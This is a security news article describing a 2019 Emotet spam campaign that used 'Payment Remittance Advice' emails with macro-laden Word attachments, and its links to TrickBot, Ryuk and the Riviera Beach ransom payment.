Cybersecurity researchers have identified a significant spam campaign spreading an Emotet banking Trojan via a malicious Word macro.
Researchers at Malwarebytes identified the campaign by after they noticed an uptick in command and control server activity and an email campaign distributing malicious messages in English, German, Italian, and Polish. Hackers first sent emails on September 16 which claimed to “Payment Remittance Advice”. Hackers commonly spoof financial organizations to convince users to open malicious Word documents and enable macros to view the contents of the document.
Trojan horses are malware disguised as harmless software. Hackers usually install them under false pretences, tricking the user into believing that they serve a legitimate purpose, such as through phishing campaigns. Once executed on a server, the hacker can then gain access to the system and steal valuable information for nefarious purposes.
Hackers have carefully crafted the campaign to maximize their chances of success. The subject lines of the emails are personalized also include the recipient’s name which the hacker has somehow accessed, such that they are addressed ‘Joe Bloggs Payment Remittance Advice’.
The body of the emails claims the attached document is a statement detailing a payment that is due. If the document is opened, the user is required to ‘enable content’ to accept the Microsoft license agreement, which the email claims is required to avoid Microsoft Word features being disabled.
If the content is enabled, a macro runs and launches a PowerShell script which downloads the Emotet Trojan from one of several compromised WordPress websites. If downloaded, the Emotet Trojan spreads laterally across the network and infect multiple devices.
The malware also hijacks the user’s email account and sends further spam emails to all individuals on the user’s contact list.
The Emotet banking Trojan steals banking credentials, but it also serves as a botnet and malware downloader. The operators of the Emotet botnet are understood to have sold access to different threat groups, including the North Korea-based Lazarus Group, which is believed to be behind Ryuk ransomware.
In addition to Ryuk ransomware, Emotet is also being used to distribute the TrickBot Trojan. The three-malware combo has been dubbed the ‘triple threat’ and has been used in devastating attacks on many businesses, cities, and municipalities.
One of the most famous examples occurred in Riviera Beach, Florida. That attack resulted in widespread file encryption which disabled many services in the city. Riviera Beach officials were forced to pay a $600,000 ransom payment for the keys to unlock the encryption. According to Malwarebytes, the ransomware strain has earned at least $3.8 million in the first six months of 2019.